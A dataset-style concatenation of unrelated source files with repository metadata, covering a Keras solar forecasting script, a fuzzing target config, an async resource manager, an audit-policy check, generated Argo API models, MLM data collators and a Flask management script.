filepath = f'c:/data/test/solar/checkpoint/solar_checkpoint5_time{i}-{a}-{q}.hdf5'
cp = ModelCheckpoint(filepath, save_best_only=True, monitor = 'val_loss')
model.fit(x_train,y_train,epochs = epochs, batch_size = bs, validation_data = (x_val,y_val),callbacks = [es,lr,cp])
return
# 1. 데이터
train = pd.read_csv('c:/data/test/solar/train/train.csv')
sub = pd.read_csv('c:/data/test/solar/sample_submission.csv')
# 데이터 npy로 바꾸기
data = train.values
print(data.shape)
np.save('c:/data/test/solar/train.npy', arr=data)
data =np.load('c:/data/test/solar/train.npy')
# 전치를 활용한 데이터 시간별 묶음
data = data.reshape(1095, 48, 9)
data = np.transpose(data, axes=(1,0,2))
print(data.shape)
data = data.reshape(48*1095,9)
df = train.copy()
df.loc[:,:] = data
df.to_csv('c:/data/test/solar/train_trans.csv', index=False)
# 시간별 모델 따로 생성
train_trans = pd.read_csv('c:/data/test/solar/train_trans.csv')
train_data = preprocess_data(train_trans) # (52560,7)
from tensorflow.keras.callbacks import EarlyStopping, ReduceLROnPlateau, ModelCheckpoint
es = EarlyStopping(monitor = 'val_loss', patience = 15)
lr = ReduceLROnPlateau(monitor = 'val_loss', patience = 5, factor = 0.5, verbose = 1)
# for문으로 시간, quantile, day7,8 을 구분하여 체크포인트 생성
for i in range(48):
train_sort = train_data[1095*(i):1095*(i+1)]
train_sort = np.array(train_sort)
y = train_sort[7:,-1] #(1088,)
from sklearn.preprocessing import StandardScaler
scaler = StandardScaler()
scaler.fit(train_sort)
train_sort = scaler.transform(train_sort)
x = split_x(train_sort, 7)
x = x[:-2,:] #(1087,7,7)
y1 = y[:-1] #(1087,)
y2 = y[1:] #(1087,)
from sklearn.model_selection import train_test_split
x_train, x_val, y1_train, y1_val, y2_train, y2_val = train_test_split(x, y1, y2, train_size=0.8, shuffle=True, random_state=32)
epochs = 1000
bs = 32
only_compile(0, x_train, y1_train, x_val, y1_val)
only_compile(1, x_train, y2_train, x_val, y2_val)
| [
"76455292+SunghoonSeok@users.noreply.github.com"
] | 76455292+SunghoonSeok@users.noreply.github.com |
d7c870c6c4ac1878e11b895e1762fa9c2276425c | 35567c513fcaff673433d24a8353193f2384435c | /src/wafp/targets/catalog/otto_parser/__init__.py | cea36b73513f5fcb30d0d6856288df295c3e9cb7 | [
"MIT"
] | permissive | schemathesis/web-api-fuzzing-project | 7d573c28b73e5b5ea2660fff3d79c5763b13d1a1 | 4f9d9614dafb06ea7d469a8fc9de230c1f152bdd | refs/heads/main | 2023-07-13T12:48:01.934609 | 2023-06-29T21:44:21 | 2023-06-29T21:44:21 | 354,606,912 | 12 | 1 | null | 2023-01-29T00:44:44 | 2021-04-04T17:35:40 | Python | UTF-8 | Python | false | false | 850 | py | from wafp.targets import (
BaseTarget,
Language,
Metadata,
Package,
SchemaSource,
SchemaSourceType,
Specification,
SpecificationType,
)
class Default(BaseTarget):
def get_base_url(self) -> str:
return f"http://0.0.0.0:{self.port}/"
def get_schema_location(self) -> str:
return str(self.path / "schema.yaml")
def is_ready(self, line: bytes) -> bool:
return b"Server listening on " in line
def get_metadata(self) -> Metadata:
return Metadata(
language=Language.RUST,
framework=Package(name="tide", version="0.14.0"),
schema_source=SchemaSource(type=SchemaSourceType.STATIC, library=None),
specification=Specification(name=SpecificationType.OPENAPI, version="3.0.3"),
validation_from_schema=False,
)
| [
"dadygalo@gmail.com"
] | dadygalo@gmail.com |
b6f00ea9445cb2ed873ffc84fb662a6f421f60ba | 38cec74894f6d4296412f5c5c497ac2fd9574047 | /lib/timer/managed_resource.py | b4a4d0ae9912ce2ac3f18f5cc82611c645e6b5b5 | [] | no_license | jweaver85/neopixel-pico | bbc38afe8cf93d56432b184df9d965fa3c49808f | 11f2a17dba1718745db5038f54020d6539c982b5 | refs/heads/main | 2023-07-19T18:53:17.704179 | 2021-09-01T01:40:01 | 2021-09-01T01:40:01 | 370,134,083 | 0 | 0 | null | 2021-08-31T02:58:32 | 2021-05-23T18:55:51 | Python | UTF-8 | Python | false | false | 3,103 | py | import timer
class ManagedResource:
"""
Manages a singleton resource with your functions that initialize a resource and clean it up between uses.
This class vends access to `resource` via a fair queue. Intended use is with something like a busio.SPI
with on_acquire setting a chip select pin and on_release resetting that pin.
A ManagedResource instance should be shared among all users of `resource`.
"""
def __init__(self, resource, on_acquire=lambda *args, **kwargs: None, on_release=lambda *args, **kwargs: None, loop=timer.get_loop()):
"""
:param resource: The resource you want to manage access to (e.g., a busio.SPI)
:param on_acquire: function(*args, **kwargs) => void acquires your singleton resource (CS pin low or something)
:param on_release: function(*args, **kwargs) => void releases your singleton resource (CS pin high or something)
"""
self._resource = resource
self._on_acquire = on_acquire
self._on_release = on_release
self._loop = loop
self._ownership_queue = []
self._owned = False
def handle(self, *args, **kwargs):
"""
returns a reusable, reentrant handle to the managed resource.
args and kwargs are passed to on_acquire and on_release functions you provided with the resource.
"""
return ManagedResource.Handle(self, args, kwargs)
async def _aenter(self, args, kwargs):
if self._owned:
# queue up for access to the resource later
await_handle, resume_fn = self._loop.suspend()
self._ownership_queue.append(resume_fn)
# This leverages the suspend() feature in timer; this current coroutine is not considered again until
# the owning job is complete and __aexit__s below. This keeps waiting handles as cheap as possible.
await await_handle
self._owned = True
self._on_acquire(*args, **kwargs)
return self._resource
async def _aexit(self, args, kwargs):
assert self._owned, 'Exited from a context where a managed resource was not owned'
self._on_release(*args, **kwargs)
if len(self._ownership_queue) > 0:
resume_fn = self._ownership_queue.pop(0)
# Note that the awaiter has already passed the ownership check.
# By not resetting to unowned here we avoid unfair resource starvation in certain code constructs.
resume_fn()
else:
self._owned = False
class Handle:
"""
For binding resource initialization/teardown args to a resource.
"""
def __init__(self, managed_resource, args, kwargs):
self._managed_resource = managed_resource
self._args = args
self._kwargs = kwargs
async def __aenter__(self):
return await self._managed_resource._aenter(self._args, self._kwargs)
async def __aexit__(self, exc_type, exc_val, exc_tb):
return await self._managed_resource._aexit(self._args, self._kwargs)
| [
"justinweaver1985@gmail.com"
] | justinweaver1985@gmail.com |
f1c1d1272813db29b692fe04bc813b6a679526fc | 34599596e145555fde0d4264a1d222f951f49051 | /pcat2py/class/20dbcc2a-5cc5-11e4-af55-00155d01fe08.py | b39c4aee05264d664cba5c47aa38bafddd842eb2 | [
"MIT"
] | permissive | phnomcobra/PCAT2PY | dc2fcbee142ce442e53da08476bfe4e68619346d | 937c3b365cdc5ac69b78f59070be0a21bdb53db0 | refs/heads/master | 2021-01-11T02:23:30.669168 | 2018-02-13T17:04:03 | 2018-02-13T17:04:03 | 70,970,520 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 961 | py | #!/usr/bin/python
################################################################################
# 20dbcc2a-5cc5-11e4-af55-00155d01fe08
#
# Justin Dierking
# justindierking@hardbitsolutions.com
# phnomcobra@gmail.com
#
# 10/24/2014 Original Construction
################################################################################
class Finding:
def __init__(self):
self.output = []
self.is_compliant = False
self.uuid = "20dbcc2a-5cc5-11e4-af55-00155d01fe08"
def check(self, cli):
# Initialize Compliance
self.is_compliant = False
# Get Auditpol Value
enabled = cli.get_auditpol(r'Special Logon', 'Success')
# Output Lines
self.output = [r'Special Logon', ('Success=' + str(enabled))]
if enabled:
self.is_compliant = True
return self.is_compliant
def fix(self, cli):
cli.set_auditpol(r'Special Logon', 'Success', True)
| [
"phnomcobra@gmail.com"
] | phnomcobra@gmail.com |
2c13a2ad2330d2baa37a1eefedee78edf5ec460e | 837deb0044ec12b6f5261c6453f9909a5bbfbf25 | /api/accounts/serializers.py | 8ff407ad34d643d86f23eff12822c5cdac264a5d | [
"MIT"
] | permissive | yetiblue/testtemplate | 7de10c9e71713377adb0211c6728aa82a84567fe | 1fdc8a987710be89f53551934bf0539a8899b12a | refs/heads/master | 2023-07-11T23:36:03.636055 | 2020-07-29T16:51:25 | 2020-07-29T16:51:25 | 283,553,637 | 0 | 0 | MIT | 2023-06-21T23:09:45 | 2020-07-29T16:51:23 | Vue | UTF-8 | Python | false | false | 200 | py | from rest_framework import serializers
from accounts.models import User
class UserSerializer(serializers.ModelSerializer):
class Meta:
exclude = ["id", "password"]
model = User
| [
"thempver@gmail.com"
] | thempver@gmail.com |
068c3a2719668d0fbb119a48641c6c1176aefbd9 | 7b4cbaa1e7bab897e34acba06f73ac17760d394a | /sdks/python/client/argo_workflows/model/io_argoproj_workflow_v1alpha1_synchronization_status.py | 222415631e7bf3e8af75e91992c1a625ab626c3d | [
"Apache-2.0"
] | permissive | nHurD/argo | 0fab7f56179c848ad8a77a9f8981cb62b4a71d09 | f4a65b11a184f7429d0615a6fa65bc2cea4cc425 | refs/heads/master | 2023-01-13T04:39:54.793473 | 2022-12-18T04:48:37 | 2022-12-18T04:48:37 | 227,931,854 | 0 | 2 | Apache-2.0 | 2019-12-13T22:24:19 | 2019-12-13T22:24:18 | null | UTF-8 | Python | false | false | 12,163 | py | """
Argo Workflows API
Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. For more information, please see https://argoproj.github.io/argo-workflows/ # noqa: E501
The version of the OpenAPI document: VERSION
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from argo_workflows.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
OpenApiModel
)
from argo_workflows.exceptions import ApiAttributeError
def lazy_import():
from argo_workflows.model.io_argoproj_workflow_v1alpha1_mutex_status import IoArgoprojWorkflowV1alpha1MutexStatus
from argo_workflows.model.io_argoproj_workflow_v1alpha1_semaphore_status import IoArgoprojWorkflowV1alpha1SemaphoreStatus
globals()['IoArgoprojWorkflowV1alpha1MutexStatus'] = IoArgoprojWorkflowV1alpha1MutexStatus
globals()['IoArgoprojWorkflowV1alpha1SemaphoreStatus'] = IoArgoprojWorkflowV1alpha1SemaphoreStatus
class IoArgoprojWorkflowV1alpha1SynchronizationStatus(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'mutex': (IoArgoprojWorkflowV1alpha1MutexStatus,), # noqa: E501
'semaphore': (IoArgoprojWorkflowV1alpha1SemaphoreStatus,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'mutex': 'mutex', # noqa: E501
'semaphore': 'semaphore', # noqa: E501
}
read_only_vars = {
}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs): # noqa: E501
"""IoArgoprojWorkflowV1alpha1SynchronizationStatus - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
mutex (IoArgoprojWorkflowV1alpha1MutexStatus): [optional] # noqa: E501
semaphore (IoArgoprojWorkflowV1alpha1SemaphoreStatus): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
return self
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs): # noqa: E501
"""IoArgoprojWorkflowV1alpha1SynchronizationStatus - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
mutex (IoArgoprojWorkflowV1alpha1MutexStatus): [optional] # noqa: E501
semaphore (IoArgoprojWorkflowV1alpha1SemaphoreStatus): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
if var_name in self.read_only_vars:
raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
f"class with read only attributes.")
| [
"noreply@github.com"
] | noreply@github.com |
b50a2e1ab089d707485cc42e0c38f5c1bf7429cd | 8c632cf57af066d2075b9d00fca352e3ad0b4e1d | /lesson 3/11 - CSV Exercise.py | bdc523022771836748ac681faaaf11ef8263a817 | [] | no_license | wesammustafa/Intro-to-Data-Science-Udacity | 65d779f2e969bf36c27f27169981b24cc8501a1f | 84ee375d0cc4b92e9c3c26368e8212bdbe1a3b89 | refs/heads/main | 2023-08-31T04:49:13.410727 | 2021-10-23T17:24:44 | 2021-10-23T17:24:44 | 412,406,658 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,227 | py | import pandas
def add_full_name(path_to_csv, path_to_new_csv):
#Assume you will be reading in a csv file with the same columns that the
#Lahman baseball data set has -- most importantly, there are columns
#called 'nameFirst' and 'nameLast'.
#1) Write a function that reads a csv
#located at "path_to_csv" into a pandas dataframe and adds a new column
#called 'nameFull' with a player's full name.
#
#For example:
# for Hank Aaron, nameFull would be 'Hank Aaron',
#
#2) Write the data in the pandas dataFrame to a new csv file located at
#path_to_new_csv
#WRITE YOUR CODE HERE
baseball_data = pandas.read_csv(path_to_csv)
baseball_data['nameFull'] = baseball_data['nameFirst'] + ' '+ baseball_data['nameLast']
baseball_data.to_csv(path_to_new_csv)
if __name__ == "__main__":
# For local use only
# If you are running this on your own machine add the path to the
# Lahman baseball csv and a path for the new csv.
# The dataset can be downloaded from this website: http://www.seanlahman.com/baseball-archive/statistics
# We are using the file Master.csv
path_to_csv = ""
path_to_new_csv = ""
add_full_name(path_to_csv, path_to_new_csv)
| [
"wesam.mustafa100@gmail.com"
] | wesam.mustafa100@gmail.com |
e0edbf38f52713fdf3fcb9f4d800149ab78a4add | e94408865d15b1afc0965a4d0525f124d2d2924c | /round1_code_backup/baseline_nezha_trained_weight/DataCollator.py | 21904335850a888462d4a88aee638dffd4853933 | [] | no_license | ngc7292/tianchi-oppo-matching | cc1d266a7faa3aa74fdfa492d6045a9671836c26 | 2d5f9a8759f3e96db36477501bce2ee0c49cf9da | refs/heads/master | 2023-05-09T00:42:36.143363 | 2021-05-11T06:46:25 | 2021-05-11T06:46:25 | 353,206,029 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,758 | py | # -*- coding: utf-8 -*-
"""
__title__="DataCollator"
__author__="ngc7293"
__mtime__="2021/3/17"
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple, Union
import torch
from transformers.tokenization_utils_base import BatchEncoding, PreTrainedTokenizerBase
from transformers import BertTokenizer
def _collate_batch(examples, tokenizer):
"""Collate `examples` into a batch, using the information in `tokenizer` for padding if necessary."""
# Tensorize if necessary.
if isinstance(examples[0], (list, tuple)):
examples = [torch.tensor(e, dtype=torch.long) for e in examples]
# Check if padding is necessary.
length_of_first = examples[0].size(0)
are_tensors_same_length = all(x.size(0) == length_of_first for x in examples)
if are_tensors_same_length:
return torch.stack(examples, dim=0)
# If yes, check if we have a `pad_token`.
if tokenizer._pad_token is None:
raise ValueError(
"You are attempting to pad samples but the tokenizer you are using"
f" ({tokenizer.__class__.__name__}) does not have a pad token."
)
# Creating the full tensor and filling it with our data.
max_length = max(x.size(0) for x in examples)
result = examples[0].new_full([len(examples), max_length], tokenizer.pad_token_id)
for i, example in enumerate(examples):
if tokenizer.padding_side == "right":
result[i, : example.shape[0]] = example
else:
result[i, -example.shape[0]:] = example
return result
@dataclass
class DataCollatorForLanguageModelingWithNgram:
"""
Data collator used for language modeling. Inputs are dynamically padded to the maximum length of a batch if they
are not all of the same length.
Args:
tokenizer (:class:`~transformers.PreTrainedTokenizer` or :class:`~transformers.PreTrainedTokenizerFast`):
The tokenizer used for encoding the data.
mlm (:obj:`bool`, `optional`, defaults to :obj:`True`):
Whether or not to use masked language modeling. If set to :obj:`False`, the labels are the same as the
inputs with the padding tokens ignored (by setting them to -100). Otherwise, the labels are -100 for
non-masked tokens and the value to predict for the masked token.
mlm_probability (:obj:`float`, `optional`, defaults to 0.15):
The probability with which to (randomly) mask tokens in the input, when :obj:`mlm` is set to :obj:`True`.
.. note::
For best performance, this data collator should be used with a dataset having items that are dictionaries or
BatchEncoding, with the :obj:`"special_tokens_mask"` key, as returned by a
:class:`~transformers.PreTrainedTokenizer` or a :class:`~transformers.PreTrainedTokenizerFast` with the
argument :obj:`return_special_tokens_mask=True`.
"""
tokenizer: PreTrainedTokenizerBase
mlm: bool = True
mlm_probability: float = 0.15
n_gram: int = 3
def __post_init__(self):
if self.mlm and self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for masked language modeling. "
"You should pass `mlm=False` to train on causal language modeling instead."
)
def __call__(
self, examples: List[Union[List[int], torch.Tensor, Dict[str, torch.Tensor]]]
) -> Dict[str, torch.Tensor]:
# Handle dict or lists with proper padding and conversion to tensor.
if isinstance(examples[0], (dict, BatchEncoding)):
batch = self.tokenizer.pad(examples, return_tensors="pt")
else:
batch = {"input_ids": _collate_batch(examples, self.tokenizer)}
# If special token mask has been preprocessed, pop it from the dict.
special_tokens_mask = batch.pop("special_tokens_mask", None)
if self.mlm:
batch["input_ids"], batch["labels"] = self.mask_tokens(
batch["input_ids"], special_tokens_mask=special_tokens_mask
)
else:
labels = batch["input_ids"].clone()
if self.tokenizer.pad_token_id is not None:
labels[labels == self.tokenizer.pad_token_id] = -100
batch["labels"] = labels
return batch
def mask_tokens(
self, inputs: torch.Tensor, special_tokens_mask: Optional[torch.Tensor] = None
) -> Tuple[torch.Tensor, torch.Tensor]:
"""
Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original.
"""
labels = inputs.clone()
# We sample a few tokens in each sequence for MLM training (with probability `self.mlm_probability`)
probability_matrix = torch.full(labels.shape, self.mlm_probability)
if special_tokens_mask is None:
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()
]
special_tokens_mask = torch.tensor(special_tokens_mask, dtype=torch.bool)
else:
special_tokens_mask = special_tokens_mask.bool()
probability_matrix.masked_fill_(special_tokens_mask, value=0.0)
masked_indices = torch.bernoulli(probability_matrix).bool()
if self.n_gram == 3:
masked_indices_left = torch.roll(masked_indices, -1, -1)
masked_indices_right = torch.roll(masked_indices, 1, -1)
masked_indices = masked_indices ^ masked_indices_left ^ masked_indices_right
labels[~masked_indices] = -100 # We only compute loss on masked tokens
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
indices_replaced = torch.bernoulli(torch.full(labels.shape, 0.8)).bool() & masked_indices
inputs[indices_replaced] = self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)
# 10% of the time, we replace masked input tokens with random word
indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced
random_words = torch.randint(len(self.tokenizer), labels.shape, dtype=torch.long)
inputs[indices_random] = random_words[indices_random]
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels
@dataclass
class DataCollatorForLanguageModelingWithNezha:
"""
Data collator used for language modeling. Inputs are dynamically padded to the maximum length of a batch if they
are not all of the same length.
Args:
tokenizer (:class:`~transformers.PreTrainedTokenizer` or :class:`~transformers.PreTrainedTokenizerFast`):
The tokenizer used for encoding the data.
mlm (:obj:`bool`, `optional`, defaults to :obj:`True`):
Whether or not to use masked language modeling. If set to :obj:`False`, the labels are the same as the
inputs with the padding tokens ignored (by setting them to -100). Otherwise, the labels are -100 for
non-masked tokens and the value to predict for the masked token.
mlm_probability (:obj:`float`, `optional`, defaults to 0.15):
The probability with which to (randomly) mask tokens in the input, when :obj:`mlm` is set to :obj:`True`.
.. note::
For best performance, this data collator should be used with a dataset having items that are dictionaries or
BatchEncoding, with the :obj:`"special_tokens_mask"` key, as returned by a
:class:`~transformers.PreTrainedTokenizer` or a :class:`~transformers.PreTrainedTokenizerFast` with the
argument :obj:`return_special_tokens_mask=True`.
"""
tokenizer: PreTrainedTokenizerBase
mlm: bool = True
mlm_probability: float = 0.15
n_gram: int = 3
def __post_init__(self):
if self.mlm and self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for masked language modeling. "
"You should pass `mlm=False` to train on causal language modeling instead."
)
def __call__(
self, examples: List[Union[List[int], torch.Tensor, Dict[str, torch.Tensor]]]
) -> Dict[str, torch.Tensor]:
# Handle dict or lists with proper padding and conversion to tensor.
if isinstance(examples[0], (dict, BatchEncoding)):
batch = self.tokenizer.pad(examples, return_tensors="pt")
else:
batch = {"input_ids": _collate_batch(examples, self.tokenizer)}
# If special token mask has been preprocessed, pop it from the dict.
special_tokens_mask = batch.pop("special_tokens_mask", None)
if self.mlm:
batch["input_ids"], batch["masked_lm_labels"] = self.mask_tokens(
batch["input_ids"], special_tokens_mask=special_tokens_mask
)
else:
labels = batch["input_ids"].clone()
if self.tokenizer.pad_token_id is not None:
labels[labels == self.tokenizer.pad_token_id] = -100
batch["masked_lm_labels"] = labels
return batch
def mask_tokens(
self, inputs: torch.Tensor, special_tokens_mask: Optional[torch.Tensor] = None
) -> Tuple[torch.Tensor, torch.Tensor]:
"""
Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original.
"""
labels = inputs.clone()
# We sample a few tokens in each sequence for MLM training (with probability `self.mlm_probability`)
probability_matrix = torch.full(labels.shape, self.mlm_probability)
if special_tokens_mask is None:
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()
]
special_tokens_mask = torch.tensor(special_tokens_mask, dtype=torch.bool)
else:
special_tokens_mask = special_tokens_mask.bool()
probability_matrix.masked_fill_(special_tokens_mask, value=0.0)
masked_indices = torch.bernoulli(probability_matrix).bool()
if self.n_gram == 3:
masked_indices_left = torch.roll(masked_indices, -1, -1)
masked_indices_right = torch.roll(masked_indices, 1, -1)
masked_indices = masked_indices ^ masked_indices_left ^ masked_indices_right
labels[~masked_indices] = -100 # We only compute loss on masked tokens
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
indices_replaced = torch.bernoulli(torch.full(labels.shape, 0.8)).bool() & masked_indices
inputs[indices_replaced] = self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)
# 10% of the time, we replace masked input tokens with random word
indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced
random_words = torch.randint(len(self.tokenizer), labels.shape, dtype=torch.long)
inputs[indices_random] = random_words[indices_random]
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels
if __name__ == '__main__':
vocab_data_path = "./vocab.txt"
print("create tokenizer...")
tokenizer = BertTokenizer(vocab_file=vocab_data_path)
data_collator = DataCollatorForLanguageModelingWithNgram(
tokenizer=tokenizer, mlm=True, mlm_probability=0.15, n_gram=3
)
print(data_collator)
| [
"feizhaoye@gmail.com"
] | feizhaoye@gmail.com |
26919ce61bc4cd179841fe1636c2052caf704c10 | 7d2df264115a103e7853c26405dd3a6812352553 | /manage.py | 15a142f12be08c0a7c58fceecf52831694364c7c | [] | no_license | stahlscott/race-support-backend | 8736d64535567ea6bc5c10ef3bd9a21fc7cf9580 | 31397674f7befea4b792eb6621f2f13dcc449b68 | refs/heads/master | 2020-05-24T22:41:13.439696 | 2019-05-21T00:49:13 | 2019-05-21T00:49:13 | 138,305,975 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,285 | py | # manage.py
import unittest
import coverage
from flask.cli import FlaskGroup
from project.server import create_app, db
from project.server.models import User, Event, Race, Rider
import subprocess
import sys
app = create_app()
cli = FlaskGroup(create_app=create_app)
# code coverage
COV = coverage.coverage(
branch=True,
include="project/*",
omit=[
"project/tests/*",
"project/server/config.py",
"project/server/*/__init__.py",
],
)
COV.start()
@cli.command()
def create_db():
"""Creates a fresh copy of the database."""
db.drop_all()
db.create_all()
db.session.commit()
@cli.command()
def drop_db():
"""Drops the db tables."""
db.drop_all()
@cli.command()
def create_admin():
"""Creates the admin user."""
db.session.add(User(email="admin", password="fakeadmin", admin=True))
db.session.commit()
@cli.command()
def create_data():
"""Creates a set of sample data for testing."""
event = Event(name="Rochester Fakelocross", bikereg_id="1", active=True)
event2 = Event(name="Rochester Fakecrit", bikereg_id="11", active=False)
db.session.add(event)
db.session.add(event2)
db.session.commit()
race1 = Race(name="Cat 1 Mens", bikereg_id="2", event_id=event.id)
race2 = Race(name="Cat 2 Mens", bikereg_id="3", event_id=event.id)
race3 = Race(name="Cat 3 Mens", bikereg_id="4", event_id=event.id)
race4 = Race(name="Cat 1 Womens", bikereg_id="5", event_id=event.id)
race5 = Race(name="Cat 2 Womens", bikereg_id="6", event_id=event.id)
race6 = Race(name="Cat 3 Womens", bikereg_id="7", event_id=event.id)
db.session.add(race1)
db.session.add(race2)
db.session.add(race3)
db.session.add(race4)
db.session.add(race5)
db.session.add(race6)
db.session.commit()
db.session.add(
Rider(
name="Big Guy",
email="blah@nope.com",
usac="123",
bib="11",
race_id=race1.id,
)
)
db.session.add(
Rider(
name="Big Guy",
email="blah@nope.com",
usac="123",
bib="13",
race_id=race2.id,
)
)
db.session.add(
Rider(
name="Another Guy",
email="blahr@nope.com",
usac="124",
bib="12",
race_id=race1.id,
)
)
db.session.commit()
@cli.command()
def test():
"""Runs the unit tests without test coverage."""
tests = unittest.TestLoader().discover("project/tests", pattern="test*.py")
result = unittest.TextTestRunner(verbosity=2).run(tests)
if result.wasSuccessful():
sys.exit(0)
else:
sys.exit(1)
@cli.command()
def cov():
"""Runs the unit tests with coverage."""
tests = unittest.TestLoader().discover("project/tests")
result = unittest.TextTestRunner(verbosity=2).run(tests)
if result.wasSuccessful():
COV.stop()
COV.save()
print("Coverage Summary:")
COV.report()
COV.html_report()
COV.erase()
sys.exit(0)
else:
sys.exit(1)
@cli.command()
def flake():
"""Runs flake8 on the project."""
